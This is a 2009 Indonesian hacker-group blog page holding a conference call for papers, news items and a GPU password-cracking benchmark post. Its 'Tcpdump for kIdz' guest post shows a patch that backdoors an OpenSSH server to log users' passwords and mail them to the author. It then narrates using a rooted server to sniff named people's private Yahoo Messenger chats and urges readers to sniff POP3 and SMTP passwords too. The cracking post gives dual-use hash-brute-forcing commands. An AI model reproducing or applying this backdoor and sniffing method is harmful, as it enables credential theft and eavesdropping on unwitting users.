Kecoak Elektronik Indonesia


About Us   Public Code   Forum   eZine

June 23, 2009

idsecconf2009 CFP

Filed under: News — byteskrew @ 8:02 pm

It’s all about hacking…

idsecconf akan diadakan kembali tahun ini, masih dengan spirit yang sama. Kami berharap pada tahun kedua ini akan lebih banyak lagi sumbangsih dari rekan-rekan komunitas security Indonesia untuk saling berbagi mengenai berbagai hal yang berhubungan dengan hacking. Ya, hacking.

Tidak ada perbedaan topi, filosofi, asal-usul, komunitas, low-level v.s high-level, etc. Submit hasil riset, ngoprek, pengalaman pribadi, exploit, poc, teknik, dsb melalui CFP idsecconf berikut

Kami dari komite idsecconf 2009 memberi kesempatan pada rekan-rekan penggiat keamanan komputer di seluruh Indonesia untuk berpartisipasi lewat penyerahan paper. Topik yang kami cari adalah seperti di bawah ini:

- Web hacking
- Wireless hacking
- Metode Penetration testing
- Forensic dan Anti Forensic
- Kriptografi
- Fuzzing
- Exploit writing
- System hardening
- Lock Picking
- Open Hardware Implementation

Jika anda memiliki judul paper diluar cakupan topik diatas, kami masih terbuka untuk mempertimbangkannya selama masih berkaitan dengan security.

Format paper adalah file Open Office Writer dengan ukuran halaman “Letter” Gambar bisa langsung disisipkan ke dalam dokumen atau dibuat terpisah. Format gambar adalah PNG dengan ukuran dimensi maksimal (lebar x tinggi ) 640 x 480 pixel dengan resolusi 72 pixel per inch. Jika nama file dipisahkan, mohon nama file dirujuk dari naskah. Setiap gambar harap disertai keterangan secukupnya.

Naskah yang dikirimkan juga sudah harus mencakup:

# Nick, email dan nomer telepon yang bisa dihubungi
# Biografi singkat, afiliasi, dan achievement (Maksimal 250 Kata).
# Rangkuman dari Persentasi (Abstraksi)(Maksimal 1250 Kata)
# Peralatan Pendukung yang dibutuhkan (video, internet, wireless, audio, etc.)
# Durasi yang di butuhkan (60 menit, 90 menit, 120 menit)

Pengiriman naskah ditujukan ke e-mail address: submitHAPUSHURUFBESAR@idsecconf.org dan
diterima paling lambat Jumat, 18 September 2009.

Keputusan penerimaan atau penolakan paper adalah sepenuhnya wewenang komite idsecconf 2009 dan tidak bisa diganggu gugat. Bagi yang papernya diterima, akan menerima pemberitahuan tertulis lewat e-mail untuk persiapan presentasi on-stage pada acara idsecconf 2009.

Kami tunggu partisipasi anda semuanya!

salam,

komite idsecconf 2009

Informasi lebih lengkap selanjutnya dapat dilihat pada situs idsecconf 2009.

Oh, did we miss to say…non-profitable events and no journalist+hidden cam allowed?!

June 11, 2009

PHRACK #66

Filed under: News, Underground — byteskrew @ 1:12 pm

Sudah di rilis dan bisa dinikmati melalui situs resminya. Huff, tonight would be fun longgg night :) .

June 7, 2009

eZine ToKeT Vol.05

Filed under: K-Elektronik — byteskrew @ 7:13 pm

Well, eZine toket Volume 05 has been released. We love writing anonymously, and still do. Catch them from here.

.astalavista has been pawned by anti-sec group.

Filed under: News, Underground — Neo Kecoak Elektronik @ 1:36 pm

.pr0j3kt m4yh3m aris again,
.sec-industry industri kembali di permalukan, kali ini giliran astalavista,

.read here for gr34t35t tr1p.

.nb:ternyata baik exploit ataupun scripts yang di publish oleh astalavista sebagian berasal dari ripping
milw0rm dan bila diperhatikan md5 hash yg dipaparkan, plaint text berisi nama like amar0184,pascal,kio42m
ataupun yang membuat kami tersenyum penggunaan adminadmin, astalavista, dan juga 123456 sebagai password.

.what the m**s with u astalavista council-

.update: nowayout /at/ astalavista staff, 3xp053d.

May 7, 2009

OpenBSD and NetBSD Updated!

Filed under: News — Neo Kecoak Elektronik @ 4:01 pm

Dua sistem operasi BSD Family dalam kurung waktu kurang lebih 2 minggu terakhir ini melakukan update major version pada sistem operasi mereka. Ya, OpenBSD me-release versi 4.5 dan NetBSD me-release versi 5.0. OpenBSD seperti biasanya selalu mengupdate versi OpenSSH pada setiap release barunya. Tidak terlalu banyak perubahan yang berarti pada release terbaru dari OpenBSD 4.5, mereka ‘hanya’ menambahkan beberapa dukungan baru terhadap beberapa hardware dan patch terhadap sistem mereka. Sedangkan pada NetBSD 5.0 cukup banyak melakukan improvement terhadap network performance, file sistem dan lain sebagainya.

So, Happy Hacking lah…

jackD

April 16, 2009

Tcpdump for kIdz

Filed under: Kidz Game, Underground — Guest Blogger @ 10:30 pm

Apakah tcpdump?
tcpdump adlah slh satu program linux,yg berfungsi untuk menangkap aliran paket
data dari eth0 eth1,yg lebih umum dikenal dengan Nm Sniffing
Ok sedikit berbagi pengalamn
tepatny kemarin ketika sy check email trnyata sdh ada bbrp log yg masuk
dri hasil Backdorinf port 22 OpenSSH 4.7p1 yg sy infect ke sbuah
server hasil rooting,ttg bgaiman cr backdooring itu sdh dijelaskn sblumnya oleh
para Dedengkot2 disini..hehehe :D

...
 //logs di file
+ if((f=fopen(LOGZ,"a"))!=NULL){
+ fprintf(f,"user:password@host --> %s:%s@%s\n",authctxt->server_user,password,authctxt->host);
+ fclose(f);
+ }
+ //kirim ke server pake curl/mail terserah
+ //example pake 'mailx'
+ snprintf(logz,sizeof(logz),"tail -1 %s|mailx -s \"[owned user]new fucked user\" [cencored]@live.com",LOGZ);
+ system(logz);
...

anda dpt membaca dr script di atas,styap ada yg
melakukan koneksi ssh dr server itu kluar maupun stu localhost
otomatis terkirim ke email sya :D
ok lgkah awal
sy login ke server hasil sniffed tsb,
lsg aja

root@ds6471:/# cat etc/hosts

127.0.0.1       localhost server0
xx.xxx.xx.xxx   rahasia.deh.id

#client customer
192.168.90.4     client1
192.168.90.10    client2
192.168.90.15    client3
192.168.90.51    client4
192.168.90.22    client5
192.168.90.201   client6

Woow..keknya server warnet nih..ato kantor ,g tau dah..^^
trs ak liat trafikny,trnyata g bsa iftop,mrka pakai Nload
hmm..

root@ds6471:/# uname -a;cat etc/issue
Linux ds6471 2.6.22-8-server #1 SMP Thu Jul 12 16:28:57 GMT 2007 i686 GNU/Linux
Ubuntu 6.06 LTS \n \l

pakai ubuntu..:D,g pake lm lsg aj

root@ds6471:/#apt-get install iftop

okee sdh terinstall

root@ds6471:/#iftop -i eth1 -F 192.168.90.10/32

               12.5Kb          25.0Kb          37.5Kb          50.0Kb    62.5Kb
+-------------------------------------------------------------------------------
192.168.90.10             <=> bs2.ads.vip.tpc.yahoo.com  5.25Kb  4.03Kb  2.99Kb
192.168.90.10             <=> tx-in-f113.google.com      3.66Kb  4.02Kb  4.22Kb
192.168.90.10             <=> ns3.turbodns.co.uk          748b   1.29Kb   983b
192.168.90.10             <=> 194.14.236.50              1.22Kb   250b    267b
192.168.90.10             <=> server6614.dedicated.webf     0b    188b     67b
192.168.90.10             <=> ds6488.dedicated.turbodns     0b    188b     67b
192.168.90.10             <=> raucousdns.co.uk              0b    188b     67b
192.168.90.10             <=> ad1.vip.rm.jp1.yahoo.net      0b    188b     67b
192.168.90.10             <=> server6485.dedicated.webf     0b    188b     67b
192.168.90.10             <=> in2.msg.vip.mud.yahoo.com    94kb   188b     67b
192.168.90.10             <=> server6542.dedicated.webf     0b    141b     50b
192.168.90.10             <=> server6437.dedicated.webf     0b    125b    132b
192.168.90.10             <=> 239.255.2.2                   0b     36b     13b
192.168.90.10             <=> server6577.dedicated.webf     0b      0b     67b
192.168.90.10             <=> server6636.dedicated.webf    90kb     0b     67b
192.168.90.10             <=> server6542.dedicated.webf     0b      0b     67b
192.168.90.10             <=> server6643.dedicated.webf     0b      0b     65b

--------------------------------------------------------------------------------
TX:             cumm:  64.4KB   peak:   3.08Kb  rates:   10.8Kb  1.72Kb  1.32Kb
RX:                    57.4KB           3.08Kb           12.6Kb  1.81Kb   904b
TOTAL:                  122KB           5.42Kb           114Kb  3.54Kb  2.21Kb

Ok ada bnyk trafik ke
disni ak akn coba sniff perckpan yahoo massnger.

root@ds6471:/#tcpdump -n -f -s 0 -X -vvv -i eth1 port 5050 and host 192.168.90.10 >>log.txt
tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes

root@ds6471:~# ls -lia
total 80
1196084 drwxr-xr-x  7 root root  4096 Apr 16 10:47 .
1179916 drwxr-xr-x 19 root root 32768 Apr 15 07:47 ..
1459192 drwx------  2 root root  4096 Feb  7 05:30 .aptitude
1202658 -rw-------  1 root root  4480 Apr 16 10:47 .bash_history
1198732 -rw-r--r--  1 root root  2227 Oct 13  2005 .bashrc
1441948 drwxr-xr-x  5 root root  4096 Jan  7 15:05 .cpan
1427211 drwxr-xr-x  3 root root  4096 Apr 15 20:00 .mc
1461933 drwxr-xr-x  4 root root  4096 Apr 16 02:28 .msf3
1198731 -rw-r--r--  1 root root   141 Oct 13  2005 .profile
1427701 drwx------  2 root root  4096 Apr 15 01:04 .ssh
1197166 -rw-r--r--  1 root root  5642 Apr 16 10:47 log.txt
root@ds6471:~#vi log.txt
04:38:19.084903 IP (tos 0x0, ttl  48, id 19232, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.12.mmcc > 192.168.90.10.spice: ., cksum 0xebfd (correct), 1186:1186(0) ack 1906 win 65535
        0x0000:  4500 0028 4b20 4000 3006 d7ce 44b4 d90c  E..(K.@.0...D...
        0x0010:  0a00 0021 13ba 0783 cadb 4578 4b27 253d  ...!......ExK'%=
        0x0020:  5010 ffff ebfd 0000                      P.......
04:38:19.088461 IP (tos 0x0, ttl  50, id 48894, offset 0, flags [DF], proto: TCP (6), length: 197) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: P, cksum 0x2ad7 (correct), 251:408(157) ack 697 win 65535
        0x0000:  4500 00c5 befe 4000 3206 6159 44b4 d906  E.....@.2.aYD...
        0x0010:  0a00 0021 13ba 044f 9c67 1abb 16f7 4f35  ...!...O.g....O5
        0x0020:  5018 ffff 2ad7 0000 594d 5347 0010 0000  P...*...YMSG....
        0x0030:  0089 0006 0000 0001 005a 514e 34c0 8064  .........ZQN4..d
        0x0040:  696b 7375 6b6d 61c0 8030 c080 6469 6b73  iksukma..0..diks
        0x0050:  756b 6d61 c080 31c0 8064 696b 7375 6b6d  ukma..1..indra_ram
        0x0060:  61c0 8035 c080 6e61 7277 6173 7475 5f65  a..5.......
        0x0070:  6b61 c080 3134 c080 4c68 6120 4d6f 6d20  ka..14..Lha.Mom.
        0x0080:  6a67 206e 7461 7220 6c6f 7720 6472 6f70  jg.ntar.low.drop
        0x0090:  2e2e 6269 6b69 6e20 7174 6132 2067 726f  ..bikin.qta2.gro
        0x00a0:  6279 616b 616e 2064 6527 c080 3633 c080  byakan.de'..63..
        0x00b0:  3b30 c080 3634 c080 30c0 8031 3030 3933  ;0..64..0..10093
        0x00c0:  c080 34c0 80                             ..4..
04:38:19.281253 IP (tos 0x0, ttl 127, id 58814, offset 0, flags [DF], proto: TCP (6), length: 40) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: ., cksum 0x566e (correct), 697:697(0) ack 408 win 64405
        0x0000:  4500 0028 e5be 4000 7f06 ee35 0a00 0021  E..(..@....5...!
        0x0010:  44b4 d906 044f 13ba 16f7 4f35 9c67 1b58  D....O....O5.g.X
        0x0020:  5010 fb95 566e 0000 0000 0000 0000       P...Vn........
04:38:27.311007 IP (tos 0x0, ttl 127, id 59642, offset 0, flags [DF], proto: TCP (6), length: 116) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xa725 (correct), 697:773(76) ack 408 win 64405
        0x0000:  4500 0074 e8fa 4000 7f06 eaad 0a00 0021  E..t..@........!
        0x0010:  44b4 d906 044f 13ba 16f7 4f35 9c67 1b58  D....O....O5.g.X
        0x0020:  5018 fb95 a725 0000 594d 5347 0010 0000  P....%..YMSG....
        0x0030:  0038 004b 0000 0016 005a 514e 3439 c080  .8.K.....ZQN49..
        0x0040:  5459 5049 4e47 c080 31c0 806e 6172 7761  TYPING..1..nnina
        0x0050:  7374 755f 656b 61c0 8031 34c0 8020 c080  _dewi..14.....
        0x0060:  3133 c080 31c0 8035 c080 6469 6b73 756b  13..1..5..indra_ra
        0x0070:  6d61 c080                                ma..
04:38:27.656225 IP (tos 0x0, ttl  50, id 25872, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x51b8 (correct), 408:408(0) ack 773 win 65535
        0x0000:  4500 0028 6510 4000 3206 bbe4 44b4 d906  E..(e.@.2...D...
        0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 4f81  ...!...O.g.X..O.
        0x0020:  5010 ffff 51b8 0000                      P...Q...
04:38:27.935586 IP (tos 0x0, ttl 127, id 59670, offset 0, flags [DF], proto: TCP (6), length: 116) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xa725 (correct), 697:773(76) ack 408 win 64405
        0x0000:  4500 0074 e916 4000 7f06 ea91 0a00 0021  E..t..@........!
        0x0010:  44b4 d906 044f 13ba 16f7 4f35 9c67 1b58  D....O....O5.g.X
        0x0020:  5018 fb95 a725 0000 594d 5347 0010 0000  P....%..YMSG....
        0x0030:  0038 004b 0000 0016 005a 514e 3439 c080  .8.K.....ZQN49..
        0x0040:  5459 5049 4e47 c080 31c0 806e 6172 7761  TYPING..1..
        0x0050:  7374 755f 656b 61c0 8031 34c0 8020 c080  ..14.....
        0x0060:  3133 c080 31c0 8035 c080 6469 6b73 756b  13..1..5..indra_ra
        0x0070:  6d61 c080                                ma..
04:38:28.145719 IP (tos 0x0, ttl  50, id 32447, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x51b8 (correct), 408:408(0) ack 773 win 65535
        0x0000:  4500 0028 7ebf 4000 3206 a235 44b4 d906  E..(~.@.2..5D...
        0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 4f81  ...!...O.g.X..O.
        0x0020:  5010 ffff 51b8 0000                      P...Q...
04:38:30.059920 IP (tos 0x0, ttl 127, id 59763, offset 0, flags [DF], proto: TCP (6), length: 77) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0x9d0a (correct), 773:810(37) ack 408 win 64405
        0x0000:  4500 004d e973 4000 7f06 ea5b 0a00 0021  E..M.s@....[...!
        0x0010:  44b4 d906 044f 13ba 16f7 4f81 9c67 1b58  D....O....O..g.X
        0x0020:  5018 fb95 9d0a 0000 594d 5347 0010 0000  P.......YMSG....
        0x0030:  0011 008a 0000 0000 005a 514e 30c0 806e  .........ZQN0..n
        0x0040:  6172 7761 7374 755f 656b 61c0 80         nina_dewi..
04:38:30.371870 IP (tos 0x0, ttl  50, id 60817, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5193 (correct), 408:408(0) ack 810 win 65535
        0x0000:  4500 0028 ed91 4000 3206 3363 44b4 d906  E..(..@.2.3cD...
        0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 4fa6  ...!...O.g.X..O.
        0x0020:  5010 ffff 5193 0000                      P...Q...
04:38:38.347798 IP (tos 0x0, ttl 127, id 59995, offset 0, flags [DF], proto: TCP (6), length: 146) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0x0704 (correct), 810:916(106) ack 408 win 64405
        0x0000:  4500 0092 ea5b 4000 7f06 e92e 0a00 0021  E....[@........!
        0x0010:  44b4 d906 044f 13ba 16f7 4fa6 9c67 1b58  D....O....O..g.X
        0x0020:  5018 fb95 0704 0000 594d 5347 0010 0000  P.......YMSG....
        0x0030:  0056 0006 5a55 aa56 005a 514e 31c0 806e  .V..ZU.V.ZQN1..n
        0x0040:  6172 7761 7374 755f 656b 61c0 8035 c080  nina_dewi..5..
        0x0050:  6469 6b73 756b 6d61 c080 3937 c080 31c0  indra_rama..97..1.
        0x0060:  8036 33c0 803b 30c0 8036 34c0 8030 c080  .63..;0..64..0..
        0x0070:  3230 36c0 8031 c080 3134 c080 6472 7064  206..1..14..drpd
        0x0080:  2041 2720 7967 2064 726f 7020 6861 796f  .A'.yg.drop.hayo
        0x0090:  c080                                     ..
04:38:38.663087 IP (tos 0x0, ttl  50, id 36364, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5129 (correct), 408:408(0) ack 916 win 65535
        0x0000:  4500 0028 8e0c 4000 3206 92e8 44b4 d906  E..(..@.2...D...
        0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 5010  ...!...O.g.X..P.
        0x0020:  5010 ffff 5129 0000                      P...Q)..
04:38:38.675807 IP (tos 0x0, ttl 127, id 60002, offset 0, flags [DF], proto: TCP (6), length: 192) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xf909 (correct), 916:1068(152) ack 408 win 64405
        0x0000:  4500 00c0 ea62 4000 7f06 e8f9 0a00 0021  E....b@........!
        0x0010:  44b4 d906 044f 13ba 16f7 5010 9c67 1b58  D....O....P..g.X
        0x0020:  5018 fb95 f909 0000 594d 5347 0010 0000  P.......YMSG....
        0x0030:  0038 004b 0000 0016 005a 514e 3439 c080  .8.K.....ZQN49..
        0x0040:  5459 5049 4e47 c080 31c0 806e 6172 7761  TYPING..1..
        0x0050:  7374 755f 656b 61c0 8031 34c0 8020 c080  dewi_eka..14.....
        0x0060:  3133 c080 30c0 8035 c080 6469 6b73 756b  13..0..5..indra_ra
        0x0070:  6d61 c080 594d 5347 0010 0000 0038 004b  ma..YMSG.....8.K
        0x0080:  0000 0016 005a 514e 3439 c080 5459 5049  .....ZQN49..TYPI
        0x0090:  4e47 c080 31c0 806e 6172 7761 7374 755f  NG..1..anak_
        0x00a0:  656b 61c0 8031 34c0 8020 c080 3133 c080  ilang..14.....13..
        0x00b0:  30c0 8035 c080 6469 6b73 756b 6d61 c080  0..5..indra_rama..
04:38:38.987713 IP (tos 0x0, ttl  50, id 40636, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5091 (correct), 408:408(0) ack 1068 win 65535
        0x0000:  4500 0028 9ebc 4000 3206 8238 44b4 d906  E..(..@.2..8D...
        0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 50a8  ...!...O.g.X..P.
        0x0020:  5010 ffff 5091 0000                      P...P...

yap kita telah me log percakapan mreka..
nah sekarang bagimana untuk sniff password,data2 ptg
bnyak berbagai cr…
selanjutnya anda dapet mengembangkn sendiri..
untk seperti pop3 ,smtp,dll..

Cheers,
Xsniffer

April 1, 2009

Mendeteksi Conficker dengan Network Scanner

Filed under: News — byteskrew @ 11:42 am

Salah satu media hype tentang Conficker ini bisa dilihat dari sini. Nmap salah satu yang menambahkan tehnik deteksi Conficker, bisa dibaca selengkapnya dari sini.

Host 10.10.93.191 is up (0.00016s latency).
Interesting ports on 10.10.93.191:
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|  smb-check-vulns:  
|  MS08-067: NOT RUN
|  Conficker: Likely CLEAN
|_ regsvc DoS: NOT RUN (add --script-args=unsafe=1 to run)

Along with Honeynet’s Tillmann Werner and Felix Leder, Kaminsky soon noticed that Conficker changes the way a small piece of the Windows operating system acts. The behavior, located in pre-authentication routines before users enter file-sharing passwords, makes easy-to-identify changes to the way machines look on a network.

Itu kuncinya, jadi pada dasarnya mirip dengan tehnik deteksi operating system yang diperkenalkan oleh tools semacam nmap. Yang pasti, dari hype tersebut, tanggal 1 april conficker akan dimodifikasi secara massal. Jadi, mungkin sudah tidak bisa dideteksi dengan cara yang sama? :) .

March 29, 2009

*Toket, t0keT, tOk3t* CFP

Filed under: K-Elektronik — byteskrew @ 1:14 pm

Masih ingat dengan cerita ini? atau search engine berikut ini? well, dalam rangka mempertahankan posisi pada urutan pertama, maka sekali lagi kami mengeluarkan CFP untuk TOKET (Terbitan Online Kecoak Elektronik) yang direncanakan terbit awal Juni 2009.

Kami sadar bahwa kalian menunggu tulisan tangan dan hasil riset kami (f*ck, d*rn, narzism), namun akan jauh lebih menyenangkan jika bisa melihat beberapa tulisan dari komunitas/individu lain masuk dalam daftar eZine yang akan datang.

Please find the Call For Paper from here.

Cheers!

UFM6IEthbWkganVnYSB0ZXJ0YXJpayBkZW5nYW4gY2VyaXRhLWNlcml0YSBzZXB1dGFyIFBFTUlM
VSwgamlrYSBhZGEgeWFuZyBtZW1pbGlraSBjZXJpdGEgc2VydSBiYWlrIGRhcmkga2FsYW5nYW4g
dW5kZXJncjB1bmQgbWF1cHVuIGdvc2lwIG1lbmdlbmFpIHNpc3RlbSBQRU1JTFUgeWFuZyBoYXJn
YW55YSA8YSBocmVmPSJodHRwOi8vd3d3Lm1haWwtYXJjaGl2ZS5jb20veW9neWFmcmVlLXBlcmp1
YW5nYW5AeWFob29ncm91cHMuY29tL21zZzEwNjgwLmh0bWwiPjE3KyB0cmlseXVuPC9hPiBzaWxh
aGthbiBpa3V0IGRpa2lyaW1rYW4uIE5vLCB3ZSdyZSBub3QgYWZmaWxpYXRlIHRvIEdvdmVybm1l
bnQh

March 28, 2009

.gpu pull away ur cpu.

Filed under: News, Tips 'n Trick — Neo Kecoak Elektronik @ 3:25 am

.so bring it on, gpu “graphics processing unit” istilah yang cukup sering di dengar dalam industri graphic card dikarenakan vga sekarang ini,menerapkan proses komputasi secara terpisah dengan cpu. nvidia dengan cuda-nya,ati dengan ati stream-nya dan dalam perkembangan gpu menerapkan sistem multi core. 240 core [at] nvidia gt 280, cpu sendiri hanya 2/4 core yang umum beredar.

.walau dalam tujuan komersial, pihak rusia mulai menerapkan gpu dalam proses cracking. dari kubu open source ada beberapa project yang menarik dari pyrit sampai CUDA-Multiforcer. dimana juga menerapkan gpu dalam proses crackingnya. gpu cracking lebih menitik beratkan ke cuda dimana dukungan driver dari nvidia lebih baik.
.let’s join our class.

.in wind#ws with BarsWF MD5.
.barsWF melakukan proses bruteforce terhadap single hash md5 dengan bantuan gpu. akhir-akhir ini bahkan sering digunakan sebagai ajang benchmark sebuah mesin.

.–with gpu–.

+-----------------------------------------------------------+
? BarsWF MD5 bruteforcer v0.8 ?       http://3.14.by/en/md5 ?
? by Svarychevski Michail             http://3.14.by/ru/md5 ?
?-----------------------------------------------------------?
?    GPU0:  243.92 MHash/sec     CPU0:   42.92 MHash/sec    ?
?                                CPU1:   36.80 MHash/sec    ?
?                                                           ?
?    GPU*:  243.92 MHash/sec     CPU*:   79.72 MHash/sec    ?
?-----------------------------------------------------------?
? Key: %?u*q                Avg.Total:  314.76 MHash/sec    ?
? Hash:2E86E42F251DC797E33C41674AF40053                     ?
? Progress: 90.84 % ETC    0 days  0 hours  0 min  1 sec    ?
+-----------------------------------------------------------+
-- Key is: d0tZ-??-------------------------------------------
found at 12second

.–doesn’t with gpu–.

+-----------------------------------------------------------+
? BarsWF MD5 bruteforcer v0.8 ?       http://3.14.by/en/md5 ?
? by Svarychevski Michail             http://3.14.by/ru/md5 ?
?-----------------------------------------------------------?
?                                CPU0:   41.65 MHash/sec    ?
?                                CPU1:   42.87 MHash/sec    ?
?                                                           ?
?    GPU*:    0.00 MHash/sec     CPU*:   84.52 MHash/sec    ?
?-----------------------------------------------------------?
? Key: U(tjt                Avg.Total:   80.38 MHash/sec    ?
? Hash:2E86E42F251DC797E33C41674AF40053                     ?
? Progress: 90.57 % ETC    0 days  0 hours  0 min  5 sec    ?
+-----------------------------------------------------------+
-- Key is: d0tZ-??-------------------------------------------
found at 54second

.seperti yang dapat dilihat, penggunaan tanpa proses gpu memakan waktu 4.5 kalinya daripada proses pertama.

$ lspci | grep -i vga
01:00.0 VGA compatible controller: nVidia Corporation G94 [GeForce 9600 GT] (rev a1)

$ lspci -v -s 01:00.0
01:00.0 VGA compatible controller: nVidia Corporation G94 [GeForce 9600 GT] (rev a1)
Flags: bus master, fast devsel, latency 0, IRQ 16
Memory at fa000000 (32-bit, non-prefetchable) [size=16M]
Memory at c0000000 (64-bit, prefetchable) [size=512M]
Memory at f8000000 (64-bit, non-prefetchable) [size=32M]
I/O ports at af00 [size=128]
[virtual] Expansion ROM at fb000000 [disabled] [size=512K]
Capabilities: [60] Power Management version 3
Capabilities: [68] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable-
Capabilities: [78] Express Endpoint, MSI 00
Capabilities: [b4] Vendor Specific Information
Capabilities: [100] Virtual Channel
Capabilities: [128] Power Budgeting
Capabilities: [600] Vendor Specific Information
Kernel driver in use: nvidia
Kernel modules: nvidia, nvidiafb

.in linux with CUDA-Multiforcer.
.mensupport hash md4,md5 dan ntlm, bahkan proses bruteforce lebih cepat untuk huge hashlist. daripada BarsWF yang berjalan pada paltform wind#ws, blame micros#ft.

$ ./CUDA-Multiforcer -c charsets/charsetfull -f
test_hash_files/testhash.txt --min 5 --max 5 -h MD5
Launching 64-bit binary
Cryptohaze.com CUDA Multiforcer (multiple hash brute forcer)
by Bitweasil
Version 0.61 beta, length 0-14
Currently supported hash types: MD5 MD4 NTLM
Hash type: MD5
CUDA Device Information:
Device 0: "GeForce 9600 GT"
Number of cores:                               64
Clock rate:                                    1.60 GHz
Charset loaded (96 characters)
Hashes loaded (2 hashes)
Launching kernel for password length 5
Done: 54.44%  Step rate: 166.1M/s Search rate: 332.1M/sec
MD5 : 6BC018C635FC7251BC25D0E11984021E: 'h4X0r'    0x6834583072
Done: 94.62%  Step rate: 168.3M/s Search rate: 336.5M/sec
MD5 : 2E86E42F251DC797E33C41674AF40053: 'd0tZ-'    0x6430745A2D
Done: 98.64%  Step rate: 168.3M/s Search rate: 336.5M/sec

------------------------------------------

Compute done: Reference time 48.6 seconds
Stepping rate: 167.8M MD4/s
Search rate: 335.5M NTLM/s

.in linux with pyrit.
.wifoo freak, pyrit bergerak dalam wpa & wpa2 hash table generation. fleksibel, output bisa digunakan bersama cow patty dan airolib-ng.

$ ./pyrit benchmark
Pyrit 0.2.2 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

The ESSID-blobspace seems to be empty; you should create an ESSID...

Running benchmark for at least 60 seconds...

CUDA-Device #1 'GeForce 9600 GT': 3176.95 PMKs/s, 98.14% occupancy
CPU-Core (x86): 259.89 PMKs/s, 98.33% occupancy

Benchmark done. 3436.84 PMKs/s total.

.*tested [on] e2160@2.7Ghz,4 gb ram and nvidia 9600gt.

.bila diterapkan secara distribusi seperti pada ezine sebelumnya.
.keeewwlll house of cracking will be born.

.gamer freak or hash freak, once again make ur choice,

.EOF–

March 20, 2009

Squirrel Shell, Portability Scripting Language.

Filed under: News, Programming — Neo Kecoak Elektronik @ 4:57 pm

very interesting…, itu yang pertama kali yang ada dibenak saya ketika membaca tulisan ini. Anda tidak perlu menulis ulang script yang telah anda buat di sebuah system ketika anda sudah membuatnya di system yang lain.Yap, portability, itu salah satu tujuan utama project ini dibuat. silahkan check disini untuk keterangan lebih lengkap.

Happy Scripting,

jackD

Blog By You-Know-What